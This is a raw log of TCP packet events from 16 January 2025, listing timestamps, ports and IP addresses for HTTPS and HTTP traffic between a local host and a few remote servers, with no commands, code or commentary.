                                                          Jan 16, 2025 05:17:34.763242960 CET49754443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:34.763242960 CET49754443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:34.763314009 CET44349754104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:34.763390064 CET49754443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:34.763390064 CET49754443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:34.793766022 CET44349755104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:34.793834925 CET44349755104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:34.793881893 CET49755443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:34.793900967 CET44349755104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:34.793977976 CET49755443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:34.794197083 CET44349755104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:34.794255018 CET44349755104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:34.794305086 CET49755443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:34.794318914 CET44349755104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:34.794370890 CET49755443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:34.794867992 CET44349755104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:34.795006990 CET44349755104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:34.795056105 CET44349755104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:34.795056105 CET49755443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:34.795089006 CET44349755104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:34.795123100 CET49755443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:34.795867920 CET44349755104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:34.795902014 CET44349755104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:34.795922995 CET49755443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:34.795938969 CET44349755104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:34.795985937 CET49755443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:34.795998096 CET44349755104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:34.796730995 CET44349755104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:34.796768904 CET44349755104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:34.796798944 CET49755443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:34.796813965 CET44349755104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:34.796863079 CET49755443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:34.796875954 CET44349755104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:34.833826065 CET44349755104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:34.833858013 CET44349755104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:34.833878994 CET49755443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:34.833904028 CET44349755104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:34.833954096 CET49755443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:34.863306999 CET4434975635.190.80.1192.168.2.4
                                                          Jan 16, 2025 05:17:34.863548994 CET49756443192.168.2.435.190.80.1
                                                          Jan 16, 2025 05:17:34.863610983 CET4434975635.190.80.1192.168.2.4
                                                          Jan 16, 2025 05:17:34.865288973 CET4434975635.190.80.1192.168.2.4
                                                          Jan 16, 2025 05:17:34.865506887 CET49756443192.168.2.435.190.80.1
                                                          Jan 16, 2025 05:17:34.867258072 CET49756443192.168.2.435.190.80.1
                                                          Jan 16, 2025 05:17:34.867379904 CET49756443192.168.2.435.190.80.1
                                                          Jan 16, 2025 05:17:34.867407084 CET4434975635.190.80.1192.168.2.4
                                                          Jan 16, 2025 05:17:34.867480040 CET4434975635.190.80.1192.168.2.4
                                                          Jan 16, 2025 05:17:34.911183119 CET49756443192.168.2.435.190.80.1
                                                          Jan 16, 2025 05:17:34.911242008 CET4434975635.190.80.1192.168.2.4
                                                          Jan 16, 2025 05:17:34.964251995 CET49756443192.168.2.435.190.80.1
                                                          Jan 16, 2025 05:17:35.071485996 CET44349755104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:35.071679115 CET44349755104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:35.071749926 CET49755443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:35.071775913 CET44349755104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:35.071805954 CET44349755104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:35.071858883 CET49755443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:35.072010040 CET44349755104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:35.072104931 CET44349755104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:35.072163105 CET49755443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:35.072185993 CET44349755104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:35.072267056 CET49755443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:35.072283030 CET44349755104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:35.072339058 CET44349755104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:35.072370052 CET49755443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:35.072438955 CET44349755104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:35.072504997 CET49755443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:35.072519064 CET44349755104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:35.072546959 CET44349755104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:35.072608948 CET49755443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:35.072623014 CET44349755104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:35.072645903 CET44349755104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:35.072712898 CET49755443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:35.072726965 CET44349755104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:35.072750092 CET44349755104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:35.072808027 CET49755443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:35.072822094 CET44349755104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:35.072922945 CET44349755104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:35.072982073 CET49755443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:35.072995901 CET44349755104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:35.073040009 CET44349755104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:35.073093891 CET49755443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:35.073108912 CET44349755104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:35.073133945 CET44349755104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:35.073158026 CET49755443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:35.073175907 CET44349755104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:35.073199987 CET49755443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:35.073218107 CET44349755104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:35.073271036 CET49755443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:35.073285103 CET44349755104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:35.073337078 CET49755443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:35.074008942 CET44349755104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:35.074080944 CET49755443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:35.074210882 CET44349755104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:35.074280977 CET49755443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:35.074307919 CET44349755104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:35.074326992 CET4434975635.190.80.1192.168.2.4
                                                          Jan 16, 2025 05:17:35.074435949 CET44349755104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:35.074595928 CET49755443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:35.074626923 CET4434975635.190.80.1192.168.2.4
                                                          Jan 16, 2025 05:17:35.074676037 CET49755443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:35.074703932 CET44349755104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:35.074722052 CET49756443192.168.2.435.190.80.1
                                                          Jan 16, 2025 05:17:35.075762987 CET49756443192.168.2.435.190.80.1
                                                          Jan 16, 2025 05:17:35.075825930 CET4434975635.190.80.1192.168.2.4
                                                          Jan 16, 2025 05:17:35.076374054 CET49758443192.168.2.435.190.80.1
                                                          Jan 16, 2025 05:17:35.076457977 CET4434975835.190.80.1192.168.2.4
                                                          Jan 16, 2025 05:17:35.076540947 CET49758443192.168.2.435.190.80.1
                                                          Jan 16, 2025 05:17:35.076921940 CET49758443192.168.2.435.190.80.1
                                                          Jan 16, 2025 05:17:35.077009916 CET4434975835.190.80.1192.168.2.4
                                                          Jan 16, 2025 05:17:35.406835079 CET49759443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:35.406919003 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:35.407267094 CET49759443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:35.407665014 CET49759443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:35.407726049 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:35.533699036 CET4434975835.190.80.1192.168.2.4
                                                          Jan 16, 2025 05:17:35.543381929 CET49758443192.168.2.435.190.80.1
                                                          Jan 16, 2025 05:17:35.543442011 CET4434975835.190.80.1192.168.2.4
                                                          Jan 16, 2025 05:17:35.545552015 CET4434975835.190.80.1192.168.2.4
                                                          Jan 16, 2025 05:17:35.548988104 CET49758443192.168.2.435.190.80.1
                                                          Jan 16, 2025 05:17:35.549432039 CET49758443192.168.2.435.190.80.1
                                                          Jan 16, 2025 05:17:35.549485922 CET4434975835.190.80.1192.168.2.4
                                                          Jan 16, 2025 05:17:35.591423988 CET4434975835.190.80.1192.168.2.4
                                                          Jan 16, 2025 05:17:35.594777107 CET49758443192.168.2.435.190.80.1
                                                          Jan 16, 2025 05:17:35.676661968 CET4434975835.190.80.1192.168.2.4
                                                          Jan 16, 2025 05:17:35.676845074 CET4434975835.190.80.1192.168.2.4
                                                          Jan 16, 2025 05:17:35.677084923 CET49758443192.168.2.435.190.80.1
                                                          Jan 16, 2025 05:17:35.679889917 CET49758443192.168.2.435.190.80.1
                                                          Jan 16, 2025 05:17:35.679919958 CET4434975835.190.80.1192.168.2.4
                                                          Jan 16, 2025 05:17:35.866499901 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:35.866871119 CET49759443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:35.866934061 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:35.867666006 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:35.868201971 CET49759443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:35.868294954 CET49759443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:35.868294954 CET49759443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:35.868326902 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:35.868427992 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:35.868541002 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:35.923068047 CET49759443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:36.021619081 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.021754980 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.021837950 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.021924019 CET49759443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:36.021930933 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.022001028 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.022017002 CET49759443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:36.022067070 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.022114992 CET49759443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:36.022133112 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.022233963 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.022289991 CET49759443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:36.022293091 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.022322893 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.022397995 CET49759443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:36.022424936 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.076801062 CET49759443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:36.076862097 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.107772112 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.107862949 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.107952118 CET49759443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:36.107959032 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.108025074 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.108066082 CET49759443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:36.108134985 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.108186960 CET49759443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:36.108202934 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.108290911 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.108340025 CET49759443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:36.108352900 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.108453989 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.108509064 CET49759443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:36.108520985 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.109388113 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.109464884 CET49759443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:36.109477043 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.109596014 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.109652996 CET49759443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:36.109666109 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.109765053 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.109814882 CET49759443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:36.109827995 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.109935045 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.109992027 CET49759443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:36.110002995 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.110135078 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.110187054 CET49759443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:36.110198975 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.110297918 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.110349894 CET49759443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:36.110367060 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.111212969 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.111279964 CET49759443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:36.111291885 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.154287100 CET49759443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:36.194364071 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.194561958 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.194657087 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.194744110 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.194802046 CET49759443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:36.194802046 CET49759443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:36.194835901 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.194870949 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.194938898 CET49759443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:36.194957972 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.194983959 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.195099115 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.195182085 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.195194960 CET49759443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:36.195194960 CET49759443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:36.195266008 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.195306063 CET49759443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:36.195375919 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.195435047 CET49759443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:36.195451021 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.195502996 CET49759443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:36.196202040 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.196274996 CET49759443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:36.196305037 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.196363926 CET49759443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:36.196960926 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.197025061 CET49759443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:36.197031021 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.197047949 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.197077036 CET49759443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:36.197098970 CET49759443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:36.197107077 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.197120905 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.197160006 CET49759443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:36.197722912 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.197793961 CET49759443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:36.197807074 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.197865963 CET49759443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:36.197906017 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.197958946 CET49759443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:36.198126078 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.198185921 CET49759443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:36.198785067 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.198844910 CET49759443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:36.198852062 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.198868036 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.198921919 CET49759443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:36.198921919 CET49759443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:36.281274080 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.281411886 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.281488895 CET49759443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:36.281490088 CET49759443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:36.281502962 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.281553984 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.281604052 CET49759443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:36.282082081 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.282223940 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.282299042 CET49759443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:36.282299042 CET49759443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:36.282331944 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.282363892 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.282399893 CET49759443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:36.282433987 CET49759443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:36.282470942 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.282624006 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.282692909 CET49759443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:36.282692909 CET49759443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:36.282721996 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.282757998 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.282847881 CET49759443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:36.283247948 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.283360958 CET49759443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:36.283377886 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.283416033 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.283437014 CET49759443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:36.283451080 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.283502102 CET49759443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:36.283514977 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.283585072 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.283639908 CET49759443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:36.283725977 CET49759443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:36.283752918 CET44349759104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.302762032 CET49761443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:36.302798033 CET44349761104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.302850962 CET49761443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:36.303437948 CET49761443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:36.303452015 CET44349761104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.663216114 CET49762443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:36.663302898 CET44349762104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.663397074 CET49762443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:36.663746119 CET49762443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:36.663805962 CET44349762104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.763864040 CET44349761104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.764075994 CET49761443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:36.764087915 CET44349761104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.765541077 CET44349761104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.765837908 CET49761443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:36.765949011 CET49761443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:36.766277075 CET44349761104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.817341089 CET49761443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:36.895109892 CET44349761104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.895276070 CET44349761104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:36.895323992 CET49761443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:36.896945953 CET49761443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:36.896959066 CET44349761104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:37.148797989 CET44349762104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:37.149492979 CET49762443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:37.149554014 CET44349762104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:37.150263071 CET44349762104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:37.150708914 CET49762443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:37.150795937 CET49762443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:37.150824070 CET44349762104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:37.150995970 CET44349762104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:37.200206041 CET49762443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:37.294472933 CET44349762104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:37.294680119 CET44349762104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:37.294814110 CET44349762104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:37.294960022 CET49762443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:37.297985077 CET49762443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:37.298623085 CET49762443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:37.298686028 CET44349762104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:37.706854105 CET4972380192.168.2.42.22.50.144
                                                          Jan 16, 2025 05:17:37.711939096 CET80497232.22.50.144192.168.2.4
                                                          Jan 16, 2025 05:17:37.712028027 CET4972380192.168.2.42.22.50.144
                                                          Jan 16, 2025 05:17:37.815838099 CET49766443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:37.815870047 CET44349766104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:37.821914911 CET49766443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:37.822170973 CET49766443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:37.822210073 CET44349766104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:38.290720940 CET44349766104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:38.291090012 CET49766443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:38.291111946 CET44349766104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:38.292614937 CET44349766104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:38.294488907 CET49766443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:38.294651031 CET49766443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:38.294656992 CET44349766104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:38.294946909 CET44349766104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:38.343740940 CET49766443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:38.417885065 CET44349766104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:38.418032885 CET44349766104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:38.418088913 CET49766443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:38.419136047 CET49766443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:38.419156075 CET44349766104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:38.464730024 CET49768443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:38.464845896 CET44349768104.18.95.41192.168.2.4
                                                          Jan 16, 2025 05:17:38.465207100 CET49768443192.168.2.4104.18.95.41
                                                          Jan 16, 2025 05:17:38.465207100 CET49768443192.168.2.4104.18.95.41
